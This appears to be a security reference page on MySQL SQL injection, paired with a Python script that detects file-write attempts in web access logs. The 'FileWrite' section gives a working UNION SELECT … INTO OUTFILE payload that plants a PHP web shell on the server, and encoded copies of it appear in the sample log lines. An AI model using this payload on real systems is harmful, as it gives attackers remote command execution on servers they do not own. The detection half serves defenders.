MYSQL

MySQL is the most commonly used database, along with its open-source-based version, MariaDB.

FileWrite

If the web application is susceptible to SQL injection, the following payload can be used to write a file on the server:

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

Since the above command is a UNION, its number of columns has to match the number of columns in the original query that it is joined to. The number of columns can be figured out through the series of steps mentioned in the SQL injection section.
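For detection, the file-write clause described above can be searched for in web server access logs. The following is an added example, not part of the original page: it assumes common/combined log format and a payload carried in the URL, and the sample log lines, IP addresses, and parameter names are constructed.

```python
import re
from urllib.parse import unquote_plus

# INTO OUTFILE / INTO DUMPFILE followed by a quoted path is the file-write clause.
FILE_WRITE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s*['\"]([^'\"]+)['\"]", re.I)
# Common/combined log format: client, request URL, status code.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')


def normalize(raw, max_rounds=3):
    """Decode URL encoding until stable, drop /* */ comments, collapse whitespace."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)


def find_file_writes(log_lines):
    """Return (client, status, target_path) for requests carrying a file-write clause."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, url, status = m.groups()
        clause = FILE_WRITE.search(normalize(url))
        if clause:
            hits.append((client, int(status), clause.group(1)))
    return hits


# Constructed sample log lines (documentation IP ranges, made-up paths and parameters).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 1834',
    '203.0.113.7 - - [12/Mar/2024:10:01:22 +0000] "GET /item.php?id=1%27%20UNION%20SELECT%20%22x%22,null,null,null,null%20INTO%20OUTFILE%20%22/var/www/html/tmp/webshell.php%22%20--%20// HTTP/1.1" 200 512',
    # Double-encoded, as some proxies log it.
    '198.51.100.23 - - [12/Mar/2024:10:02:40 +0000] "GET /list.php?cat=2%2527%2520union%2520select%25201%2520InTo%2520OutFile%2520%2527/tmp/out.txt%2527 HTTP/1.1" 500 97',
    # Benign search text: no quoted path follows, so it is not flagged.
    '192.0.2.44 - - [12/Mar/2024:10:03:05 +0000] "GET /search?q=export+results+into+outfile HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for client, status, path in find_file_writes(SAMPLE_LOG):
        print(f"{client} status={status} attempted write to {path}")
```

A hit with a 200 status is worth checking against the filesystem for the named path; payloads sent in POST bodies do not appear in access logs and need application or database query logging instead.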
